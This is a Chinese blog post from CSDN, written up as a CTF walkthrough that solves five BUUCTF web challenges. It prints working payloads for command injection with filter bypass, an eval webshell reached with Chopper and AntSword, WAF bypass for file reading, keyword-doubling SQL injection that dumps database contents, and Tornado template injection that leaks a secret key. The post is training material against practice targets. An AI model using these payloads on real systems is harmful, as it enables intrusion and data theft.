Web学习之路(BUUCTF刷题之旅3)

最新推荐文章于 2022-09-11 12:17:45 发布
最新推荐文章于 2022-09-11 12:17:45 发布
阅读量1.8k 收藏 1
点赞数 1
分类专栏: CTF 文章标签: 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AKAXPD/article/details/122587459
版权

目录

一、[GXYCTF2019]Ping Ping Ping

二、[极客大挑战 2019]Knife

三、[RoarCTF 2019]Easy Calc

四、[极客大挑战 2019]BabySQL

五、[护网杯 2018]easy_tornado

[GXYCTF2019]Ping Ping Ping

进入目标靶机里,非常简洁明了,只有一个以GET方式传参的提示,那我们随便传一个ip。

/?ip=1;ls看一下都有什么。发现了"flag.php"文件,flag应该就在这里。

/?ip=1;cat flag.php

发现行不通,应该是空格被过滤掉了,要想办法绕过。

这里我使用$IFS$1绕过空格。

但由于我不知道他到底过滤了多少东西,这里我决定先看"index.php"文件。

和我的猜想一样,"index.php"的源代码里,我们看到了被过滤掉的标点,空格,bash,flag的贪婪匹配等等。

但这里我们看到了$a,考虑进行变量拼接。

 于是构造Payload为:?ip=1;a=g;cat$IFS$1fla$a.php

在源代码里找到了flag。

 PS:读了其他师傅的wp后,才发现这道题不止一种做法,有一种最强的使用了内联也就是``

大家可以多试试,这里我就不一一列举了。

[极客大挑战 2019]Knife

hint给的非常明显,"菜刀"。

eval($_POST["Syc"])这一段是作为后门用post提交一个字符串Syc。

这就没什么好说的了,上菜刀!!!!!!

 额,垃圾菜刀,换蚁剑。

在根目录下拿到flag。

[RoarCTF 2019]Easy Calc

查看页面源代码,发现是一个简单的计算器

<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <title>简单的计算器</title>
  
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="./libs/bootstrap.min.css">
  <script src="./libs/jquery-3.3.1.min.js"></script>
  <script src="./libs/bootstrap.min.js"></script>
</head>
<body>

<div class="container text-center" style="margin-top:30px;">
  <h2>表达式</h2>
  <form id="calc">
    <div class="form-group">
      <input type="text" class="form-control" id="content" placeholder="输入计算式" data-com.agilebits.onepassword.user-edited="yes">
    </div>
    <div id="result"><div class="alert alert-success">
            </div></div>
    <button type="submit" class="btn btn-primary">计算</button>
  </form>
</div>
<!--I've set up WAF to ensure security.-->
<script>
    $('#calc').submit(function(){
        $.ajax({
            url:"calc.php?num="+encodeURIComponent($("#content").val()),
            type:'GET',
            success:function(data){
                $("#result").html(`<div class="alert alert-success">
            <strong>答案:</strong>${data}
            </div>`);
            },
            error:function(){
                alert("这啥?算不来!");
            }
        })
        return false;
    })
</script>

</body></html>

通过分析源代码可知存在WAF,还有一个新的页面"calc.php",访问一下。

通过分析代码看到了被过滤的字符,结合上述,是WAF无疑,我们要想一下怎么绕过WAF。

 这里我们利用PHP的字符串解析特性就能够进行绕过WAF。

构造? num=phpinfo()

由于 / 被过滤掉了,我们选择使用chr(47)代替,进行目录读取。

构造?%20num=var_dump(scandir(chr(47)))

看到了"flagg",接下来读取flag。构造Payload为:

http://node4.buuoj.cn:25311/calc.php?%20num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

拿到flag。

[极客大挑战 2019] BabySQL

看到了SQL注入试一下万能密码 1'or'1'='1

发现不行,判断是 or 被过滤掉了。

下面继续测试发现select,union等都被过滤掉了。

这里用 || 来替换or,构造Payload为:

check.php?username=admin&password=1'+||+1%3D'1

 可以看到登陆成功,下面我们开始SQL注入。被过滤的select和union我们可以双写来代替。

先看字段。

Payload:?username=-1' uniunionon seselectlect 1,2,3 %23 &password=1' || 1='1

成功回显。继续爆库名。

Payload:?username=-1' uniunionon seselectlect 1,2,database() %23 &password=1' || 1='1

数据库名为"geek"。

再看一下其他库名。

Payload:?username=-1' uniunionon seselectlect 1,2,group_concat(table_schema) frfromom infoorrmation_schema.tables %23 &password=1' || 1='1

看到爆出了很多库名,发现了一个叫"ctf" 的库,我们查看一下。

爆表名。

Payload:?username=-1' uniunionon seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf' %23 &password=1' || 1='1

看一下表的列名,Payload:?username=-1' uniunionon seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema='ctf' aandnd table_name='Flag'%23 &password=1' || 1='1

 

基本可以确定flag就在这,构造Payload:

?username=-1' uniunionon seselectlect 1,2,flag frfromom ctf.Flag %23 &password=1' || 1='1

拿到flag。

 [护网杯 2018]easy_tornado

有三个文件我们分别看一下。

 看到flag在/fllllllllllllag目录下。

 "hints.txt"里给出了filehash的计算公式。

 在这里我们看到本题应该是模板注入。

 结合题目我们查看一下Tornado是什么东西,发现是一个Web框架。

然后找到了官方的文档,通过阅读发现,我们这道题应该是报错注入,即:

/error?msg={ {***} }

参数不同模板不同。

先试一下,发现ORZ,应该是被过滤掉了。

结合"hints.txt"的内容来看,我们应该是要去拿到cookie_secret的值。

在Tornado框架中,存在一些可以访问的快速对象。

这里用到的是handler.settings,handler 指向RequestHandler,而RequestHandler.settings又指向self.application.settings。

所以handler.settings就指向RequestHandler.application.settings了,这里面就是我们的一些环境变量。

因此我们构造Payload为:

error?msg={{handler.settings}}

拿到cookie_secret的值,接下来根据公式进行计算,可以手动MD5,这里使用脚本。

个人觉得python3好用一点。

import hashlib

hash = hashlib.md5()

filename='/fllllllllllllag'

cookie_secret="d3fa70da-363e-431a-9d08-d52edddce026"

hash.update(filename.encode('utf-8'))

s1=hash.hexdigest()

hash = hashlib.md5()

hash.update((cookie_secret+s1).encode('utf-8'))

print(hash.hexdigest())

 拿到MD5加密后的结果:9bd16f26fc937589f9df1ed6ece4ad1d

构造Payload为:

file?filename=/fllllllllllllag&filehash=9bd16f26fc937589f9df1ed6ece4ad1d

拿到flag。

 其实是一道简单题,了解了框架内部的环境变量即可。

AI仿生道士
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
记录BUUCTF的五道题 Secret File,Exec,LoveSQL,Ping Ping Ping,Knife
trytowritecode的博客
11-02 335
先从简单的题目开始讲起 Knife 打开靶机好的看到 eval($_POST["Syc"]); 两种解法一种菜刀,蚁剑直接连,另一种利用漏洞的本质无需工具。 因为这个利用的是远程代码执行的漏洞所以可以直接修改POST的提交参数来利用漏洞。废话不多上解法,我这边用的是蚁剑好的直接连接 根目录下有个flag文件直接点开 解法2 利用漏洞不知道为什么我的火狐的hackbar的插件不允许我提交post的数据,所以我post的提交都是用burpsuite去完成的 直接抓包提交方式改为POST的提交根据提示添加Sy
青少年CTF——CheckIn文件上传绕过——WriteUp
Amazingsuger的博客
01-20 888
青少年CTF-CheckIn文件上传绕过——WriteUp
BUUCTF--[BSidesCF 2019]SVGMagic
qq_46263951的博客
07-22 1065
进去后是一个这样的页面 这里大标题给出提示使用 Magic 将 SVG 转换为 PNG 那啥是SVG呢,先来了解一下 这里SVG是个XML的图片,并且存在可控的内容 这里可以尝试一下XEE漏洞的这种情况 由于不知道flag的路径,所以先用/proc/self/pwd/代表的是当前路径。可以构造/proc/self/pwd/flag.txt读取文件. 最终构造.svg文件内容为 <?xml version="1.0" encoding="UTF-8"?> <!D..
BUUCTF__web题解合集(四)
风过江南乱的博客
08-07 1349
一、[GXYCTF2019]禁止套娃 二、[安洵杯 2019]easy_web 三、[GKCTF2020]cve版签到 四、[SWPU2019]Web1 五、[ASIS 2019]Unicorn shop
2018HitbCTF 萌新的upload题目writeup
publicStr的博客
04-14 1878
开始前的例行叨叨:被虐到怀疑人生,比赛群加了不少,题没做出来,签到倒是越来越专业了。记录下比赛后两小时才做出来的最简单web题upload。记录下尝试过的姿势。题目介绍:根目录下:/system/   403/admin/    403/upload/   403/upfile/     403还有某个需要寻找的目录文件:/index.html/flag.php/upload.php/pic.ph...
Flask之旅《FlaskWeb开发:基于Python的Web应用开发实战》学习笔记汇总.pdf
11-17
Flask之旅《FlaskWeb开发:基于Python的Web应用开发实战》学习笔记汇总.pdf
计算机毕业设计之jsp面试刷题系统.zip
09-08
【标题】"计算机毕业设计之jsp面试刷题系统"是一个基于Java Server Pages(JSP)技术构建的在线面试题库系统。这个系统旨在帮助学生、求职者或教师进行面试准备,提供一个平台来练习和测试计算机科学和技术领域的...
AS3殿堂之路(全)
04-16
《AS3殿堂之路》是一本全面介绍ActionScript 3(AS3)编程的书籍,旨在引领读者深入理解面向对象编程(OOP)的思想,并通过AS3这一强大的脚本语言掌握其实现方法。AS3是Adobe Flash Platform的核心部分,广泛应用于...
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF部分web题目
最新发布
05-06
写题记录
BUUCTF学习笔记-Easy_Clac
weixin_42271850的博客
03-22 658
BUUCTF学习笔记-Easy_Clac 时间:2020/03/22 考点:WAF绕过、文件读取         打开是一个计算器,只要输入表达式就可以返回对应的结果。右键查看源代码,可以看到提示<!--I've set up WAF to ensure security.-->,提示我们这个网站...
php eval一句话木马干啥的,<?php eval($_POST[cmd]);?>一句话木马解读
weixin_39875503的博客
03-09 3653
php网页木马代码,大家可以看下自己的网站里面是不是有这样的代码,注意网站安全用mcafee限制w3wp.exe生成php或者asp文件。并在php.ini中设置一下。php网页木马header("content-Type:text/html;charset=gb2312");if(get_magic_quotes_gpc())foreach($_POSTas$k=>$v)$_POST[...
<?php eval($_POST[cmd]);?>
xiuzhentianting的博客
09-14 9202
执行POST来的cmd参数语句,别人可以以任何内容提交,这个程序把提交的数据当PHP语句执行,利用这个功能可以查看甚至修改你的数据库数据和文件。使用的方法可以随便编写一个HTML来完成,例如: http://....../你的名字.php> //这里面写PHP程序,随便连接数据和修改文件都可以,当然也可以用下面的语句查看你的PHP源文件来获取数据库路径和密码 $str=f
BUUCTF:[极客大挑战 2019]Knife
末初的CSDN博客
10-20 647
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]Knife 蚁剑连接,根目录发现flag
Syc 2019第10届极客大挑战wp
Rainbow_Melo
11-12 3064
1、打比赛前先撸一只猫! F12查看元素:简单的传参令?cat=dog即出flag 2、你看见过我的菜刀么 打开页面eval($_POST[“Syc”]);搬出菜刀连接找到flag即可 3、 BurpSuiiiiiit!!! 下载附件解压使用bp的Extender导入一个java类型的查看errors即得flag 4、性感潇文清,在线算卦 打开一个登陆界面,先随意输登陆一下,出现如下...
蚁剑与一句话木马
m0_55771794的博客
07-15 5972
目录 一句话木马 一个关于php的例子 入侵条件 蚁剑的下载与安装 在安装的时候注意 真题实践 一句话木马 先来说说一句话木马是什么东西 一句话木马,又简称(webshell),在很多渗透测试时,渗透人员会上传一句话木马到目前web服务目录继而提权获取系统权限。 举一个关于php的例子 <?php @eval($_POST['syc']);?> 它的原理呢,是利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以通过中国菜刀即可获取和控制整个网站目录。 ..
BUUCTF第一题笔记
热门推荐
Y4tacker的博客
06-20 1万+
关于变量前加& <?php $a =& $b ?> 这意味着 $a 和 $b 指向了同一个变量。 注: $a 和 $b 在这里是完全相同的,这并不是 $a 指向了 $b 或者相反,而是 $a 和 $b 指向了同一个地方。 题目解析 首先我们在页面中发现了关键部分 拼接/source.php后得到一串php脚本代码 <?php highlight_file(__FILE__); class emmm { public static
BUUCTF [RoarCTF 2019]Easy Calc1
lzu_lfl的博客
09-11 1375
BUUCTF [RoarCTF 2019]Easy Calc1 WP
信安之路2017:安全学习与经验分享
例如,"几年安全学习经验杂谈"提供了长期学习安全策略,而"我的渗透学习之旅"则详细介绍了渗透测试的学习路径。"信安之路从零到一"则可能是针对完全新手的入门指南,帮助读者从基础开始构建信息安全知识体系。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

AI仿生道士

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值